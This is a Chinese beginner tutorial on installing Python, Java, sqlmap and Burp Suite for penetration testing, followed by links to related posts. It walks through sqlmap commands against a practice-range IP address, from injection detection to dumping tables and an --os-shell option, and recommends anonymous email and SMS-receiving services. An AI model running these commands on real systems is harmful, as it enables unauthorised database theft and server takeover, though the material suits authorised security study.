网络安全从入门到精通(第五章-2)工具稍微介绍使用
工具安装使用教程
本文内容:~python、java的安装~sqlmap的安装~burpsuite的安装~渗透测试时,用的匿名邮箱、手机号~一款修改请求头的谷歌浏览器插件
一、编程语言安装
1,python(建议安装anaconda,这是python的集成环境)
2,Java安装这两个安装下载教程 网上一大把,建议去百度、谷歌找找。独立完成安装软件也是能力的一种锻炼。装到本机就行,不一定非要装虚拟机里
3,环境变量一般是指在操作系统中用来指定操作系统运行环境的一些参数,如果定义了这个环境变量的路径,那么当在win系统的变量中寻找不到的时候,就会去我添加的路径去寻找对应的东西简单理解:就是在cmd运行的时候,输入python或Java时,系统会去找环境变量,找到该路径的解释器如何添加环境变量? 百度就好了 很简单的步骤=====工具的核心在于指令
二、工具之sqlmap //需要python环境
1,下载安装:去官方GitHub上下载,解压即可
打开方式:2,win环境用 cmd到sqlmap的文件路径 python sqlmap.py回车即可kali下直接打开命令行,输入sqlmap2+,嫌弃在sqlmap的文件夹打开麻烦,将sqlmap文件路径放到环境变量path中,cmd,sqlmap.py即可2++,建立cmd快捷方式(位置 C:\Windows\System32) 对此快捷键,右击属性,起始位置改为sqlmap文件夹即可猫舍靶场:http://59.63.200.79:8003/?id=1 http://59.63.200.79:8014 这个是需要绕狗的进阶靶场3,实战使用(本人在kali下运行,同学们在win下 稍微改变代码即可)~sqlmap -u "http://59.63.200.79:8003/?id=1" //遇到东西 就直接回车即可 //探测有没有注入~sqlmap -u "http://59.63.200.79:8003/?id=1" --dbs//探测数据库~sqlmap -u "http://59.63.200.79:8003/?id=1" -D 指定库名字 --tables//跑指定数据库中的表 不指定库,默认跑当前页面所在库的表稍微复杂点~sqlmap -u "http://59.63.200.79:8003/?id=1" -D 库名 -T 指定表名 --columns//跑指定表中的内容~sqlmap -u "http://59.63.200.79:8003/?id=1" -D 库名 -T 表名 -C 指定字段名 --dump //跑出指定字段内容提一句:--dump是非常敏感的指令,说白了。这就是拖库。已经触碰了法律!!!简单粗暴点(不太适合挖掘src,当然有授权的情况下无所谓了)~sqlmap -u "http://59.63.200.79:8003/?id=1" -D 库名 -T 表名 --dump//跑出表中所有内容
其他指令: --count 查看表中多少条内容-v3 列出爆破的详细语句,一般用不到-delay=1 延时1秒,防止访问过快被ban--level 1-5 测试等级,默认2,实战中建议3--is-dba 查询当前用户权限如果DBA是true,可以拿到shell但是不一定能拿到--os-shell 尝试往网站放一个cmdshell(就是拥有cmd权限的shell)--flush -session 清除缓存!!!重要
三、工具之burpsuite //基于Java环境
1,下载安装:直接谷歌就行(百度应该也可以,建议谷歌)
2,注意浏览器需要设置代理,建议用浏览器插件设置代理,自己百度 谷歌
3,正常仅可以抓http的,(明文的)可以将burp导出证书 导入到浏览器之中就可以抓https(加密的)
4,日常功能~抓包,去的包,回来的包~站内爬虫~爆破//这三个是我最常用的,在这里不能细细的展开讲了(太多了)//有需要的话,私信我,人数较多的话。考虑出图文教程(其实百度、谷歌都有。)5,抓包软件的本质就是:设置听你话的中间人,可以拦截从电脑出去的数据和进入的数据,并进行随意修改
四、渗透测试时,用的匿名邮箱
1,bccto.me2,注册用手机号的话 可以用手机号接码平台
五、浏览器插件的安装
ModHeader(谷歌商店)---修改请求头的插件
pass:有些同学实在找不到怎么安装软件之类的,可以私信给我要 人数较多的话 会考虑出一些详细的教程
网络安全从入门到精通(第五章-2)工具稍微介绍使用相关推荐
- 网络安全从入门到精通(第三章) 信息收集
本文内容: 重要性-为什么要信息收集 信息收集方向-信息收集究竟收集什么? 巧用网络控件搜索引擎 1,重要性-为什么要信息收集: 信息收集的作用:最了解的人往往都是你的对手,知己知彼,百战不殆,当你所 ...
- 爬虫从入门到精通(18) |Python抓包工具Mitmproxy介绍
文章目录 一.前言 二.安装mitmproxy工具 三.mitmdump 四.mitmweb 五.编写脚本 一.前言 除了我们的抓包软件fiddler和Charles,我们今天再介绍一款抓包工具mit ...
- 网络安全从入门到精通:如何逼自己三个月学会
前言 网络安全这个行业优势有:需求量大,人才紧急,门槛低,工资高.对于许多未曾涉足IT行业「小白」来说,深入地学习网络安全是一件十分困难的事.至于一个月能不能学会网安,这个要看个人,对于时间管理不是很 ...
- GPU 编程入门到精通(五)之 GPU 程序优化进阶
版权声明:本文为博主原创文章,未经博主允许不得转载. 目录(?)[+] 博主由于工作当中的需要,开始学习 GPU 上面的编程,主要涉及到的是基于 GPU 的深度学习方面的知识,鉴于之前没有接触过 GP ...
- c语言从入门到精通ppt,C语言从入门到精通第1章.ppt
C语言从入门到精通第1章 1.2.2 认识Turbo C 2.0 1.2.2 认识Turbo C 2.0 ⑴ 菜单栏:包括[File](文件)菜单.[Edit](编辑)菜单.[Run](运行)菜单.[ ...
- Python编程从入门到实践第五章部分习题
Python编程从入门到实践第五章部分习题 5-8 5-9` names = ['admin','zhang','li','zhao','song'] for name in names:if nam ...
- Simulink仿真入门到精通(五) Simulink模型的仿真
本系列教程是根据孙忠潇编著的<<Simulink仿真及代码生成技术入门到精通>>学习笔记. 目录 Simulink仿真入门到精通(一) Simulink界面介绍 Simulin ...
- Excel数据分析从入门到精通(五)函数进阶-52个Excel函数之逻辑类函数
Excel数据分析从入门到精通(五)函数进阶-52个Excel函数之逻辑类函数 1.逻辑类函数-if 函数含义 函数使用 2.逻辑类函数-AND 函数含义 函数使用 3.逻辑类函数-OR 函数含义 函 ...
- 零基础入门转录组分析——第五章(表达定量)
零基础入门转录组分析--第五章(表达定量) 目录 零基础入门转录组分析--第五章(表达定量) 1. 序列比对结果的复查 2. 表达定量 3. 提取有效信息 4. 合并多个样本定量结果 5. 进一步修改 ...
- ArcGIS for Desktop入门教程_第五章_ArcCatalog使用 - ArcGIS知乎-新一代ArcGIS问答社区
原文:ArcGIS for Desktop入门教程_第五章_ArcCatalog使用 - ArcGIS知乎-新一代ArcGIS问答社区 1 ArcCatalog使用 1.1 GIS数据 地理信息系统, ...
最新文章
- Oracle自增列创建方法
- 还在用JDK6的同学,来看看JDK13新特性详解吧
- LSTM 为何如此有效?这五个秘密是你要知道的
- 从暗通道先验去雾到海底图像修复-三维重建辅助计算摄影
- 据说,程序员已成为女生年度最喜欢男友职业Top3?
- 解决visual studio已安装的问题
- Flink专题-BaseTransform
- Node.js 切近实战(十一) 之实时通讯
- php无法添加数据库,无法添加数据到数据库
- 曝iPhone 12 Pro耗电异常,没开启任何应用电量也急剧下降
- 标识符怎么读_音标怎么学?到底该学英式还是美式
- 智慧城市建设步入深水区 正深入到城市建设的细部环节
- MySQL之数据库操作
- win10:如何书写.reg文件修改注册表
- keras实现声音二分类
- C#小游戏,拼音打字练习
- 纬创软件本社对日JAVA开发
- 实时数仓实践(一)之数据库实时增量同步工具-CDC(Change Data Capture)
- 脑卒中css评分是什么意思,你知道房颤卒中新评分—ABC评分量表吗?
- 原生JS获取QQ好友列表